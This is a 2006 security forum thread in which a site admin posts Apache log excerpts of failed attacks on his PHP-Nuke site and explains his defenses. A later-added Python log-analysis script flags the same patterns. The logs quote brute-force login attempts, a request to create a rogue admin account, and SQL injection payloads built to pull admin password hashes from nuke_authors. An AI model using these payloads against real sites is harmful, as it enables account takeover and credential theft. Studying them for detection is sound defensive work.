IT Security and Insecurity Portal

Funny entries from www.waraxe.us webserver logs :)

Posted: Thu Jun 22, 2006 1:13 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Seems that there are lots of wannabes, trying to "administer" my website.
Many funny attack patterns can be seen in Apache logs every day, here are examples for 21 June 2006.

Wtf is this? My own base64 encoded attack string, used in TOTALLY WRONG context? Lame ...
Code:
85.100.188.119 - - [21/Jun/2006:11:53:30 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:38 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:40 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:45 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - - [21/Jun/2006:11:53:50 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:50 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:52 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:57 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:54:01 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Someone is trying to log in as admin, but got hammered by additional authentication.
By the way - "hacker" is a non-valid username.
Code:
85.103.160.11 - - [21/Jun/2006:14:03:41 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:03:50 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:03:54 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:00 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - - [21/Jun/2006:14:04:06 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:06 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - - [21/Jun/2006:14:04:12 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:13 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - - [21/Jun/2006:14:04:44 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:45 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:51 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:05:02 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.107.215.7 - - [21/Jun/2006:14:05:15 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Another funny attack - using MY OWN invention against MYSELF
Again - error 401 will hammer "attacker" down
Code:
80.69.48.174 - - [21/Jun/2006:23:40:05 +0300] "GET /admin.php?op=AddAuthor&add_aid=PcDelisi&add_name=God&add_pwd=123123&add_email=pcdelisi@hackermail.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox HTTP/1.1" 301 246 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EasyNET 5.4 Professional; MRA 4.4 (build 01348); .NET CLR 1.1.4322)"

Whoa, we have an SQL injection expert here. He/she uses AGAIN my own exploit against me
Wtf?
Code:
81.12.75.10 - - [21/Jun/2006:00:15:25 +0300] "GET /modules.php?name=Search&type=stories&query=f00bar&category=-1&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,aid,0,0,0,0,0,0%20from%20nuke_authors/* HTTP/1.0" 200 7682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"
81.12.75.10 - - [21/Jun/2006:00:15:44 +0300] "GET /modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* HTTP/1.0" 200 7660 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"
81.12.75.10 - - [21/Jun/2006:00:15:57 +0300] "GET /modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors HTTP/1.0" 200 7662 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"
81.12.75.10 - - [21/Jun/2006:00:16:04 +0300] "GET /modules.php?name=Search&type=comments&query=not123exists&instory=/%2a%2a/UNION/%2a%2a/SELECT/%2a%2a/0,0,pwd,0,aid/%2a%2a/FROM/%2a%2a/nuke_authors HTTP/1.0" 200 7662 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"
81.12.75.10 - - [21/Jun/2006:00:16:11 +0300] "GET /modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors HTTP/1.0" 200 7621 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"

For all of the wannabes:
1. You can't use admin.php if you don't know a valid username/password pair for Apache auth.
Both username and password are too good to guess or bruteforce.
Even when you get through, you have to know the phpnuke admin password.
2. The UNION trick will not work, because I have changed the default table names in the Phpnuke installation.
"%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors" gives you nothing, because there is no "nuke_authors".
3. Classical xss and sql injection tricks through the GET attack vector will fail, because of the very restricted allowed charset in the URL. Try "/", "*" or something else and all you will get is:
Alarma - one or more problems in progress:
Browser request URI contains forbidden characters, serving default page...
By the way, I will regularly update this list of lamest attack attempts.
Enjoy the summer and have a nice day

Last edited by waraxe on Wed Apr 16, 2008 11:02 pm; edited 1 time in total
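
The two patterns in the post above (repeated 401s against admin.php, and UNION SELECT probes hidden behind `/**/` or `%2a%2a`) can be pulled out of an Apache combined log automatically. This is an added example, not part of the original thread; the function names, the threshold and the sample lines (documentation-range IPs) are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache combined format: host ident user [time] "request" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)')
UNION_RE = re.compile(r'\bunion\b.*\bselect\b', re.I)

def normalize(uri):
    """URL-decode twice (covers %252a), then turn '+' and /**/ comments into spaces."""
    decoded = unquote(unquote(uri)).replace('+', ' ')
    return re.sub(r'/\*.*?\*/', ' ', decoded)

def analyze(lines, threshold=3):
    """Return (auth_failures, sqli_hits).
    auth_failures: ip -> usernames tried, for IPs with at least `threshold` 401s.
    sqli_hits: (ip, status, uri) for requests whose normalized URI has UNION ... SELECT."""
    fails, users, sqli = defaultdict(int), defaultdict(set), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, status, uri = m['ip'], int(m['status']), m['uri']
        if status == 401:
            fails[ip] += 1
            if m['user'] != '-':  # username the client sent for HTTP auth
                users[ip].add(m['user'])
        if UNION_RE.search(normalize(uri)):
            sqli.append((ip, status, uri))
    brute = {ip: users[ip] for ip, n in fails.items() if n >= threshold}
    return brute, sqli

# Constructed sample lines modelled on the excerpts in the post.
SAMPLE = [
    '192.0.2.10 - - [21/Jun/2006:14:03:41 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0"',
    '192.0.2.10 - hacker [21/Jun/2006:14:03:50 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0"',
    '192.0.2.10 - hacker [21/Jun/2006:14:03:54 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0"',
    '198.51.100.7 - - [21/Jun/2006:00:15:57 +0300] "GET /modules.php?name=Search&instory=/**/UNION/**/SELECT/**/0,0 HTTP/1.0" 200 7662 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [21/Jun/2006:00:16:04 +0300] "GET /modules.php?name=Search&instory=/%2a%2a/UNION/%2a%2a/SELECT/%2a%2a/0 HTTP/1.0" 200 7662 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [21/Jun/2006:09:00:00 +0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    print(analyze(SAMPLE))
```

A 200 status on a flagged request does not by itself mean data came back: the probes in the post were answered with 200 even though, as the post explains, the targeted table name does not exist on that installation.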

Posted: Thu Jun 22, 2006 8:53 pm

techwizz78
Regular user
Joined: Jun 19, 2006
Posts: 5

How funny is that....

Posted: Tue Jun 27, 2006 2:20 pm

y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

same to me, they (kiddies) try to attack my admin [phpBB] directory also, same as u [waraxe]; I've already changed the name a long time ago.
it workz for them, just knowing how to type
./exploit.pl path-to-url
hhhehehheheheh

_________________
IO::y3dips->new(http://clog.ammar.web.id);

Posted: Mon Jan 08, 2007 11:25 pm

DeadLink
Beginner
Joined: Jan 09, 2007
Posts: 2

they will not stop trying,,

Posted: Wed Jan 17, 2007 8:05 pm

superninja
Active user
Joined: Jul 03, 2006
Posts: 38

I want to thank you for this great security portal, I learned much!
Here take this
All times are GMT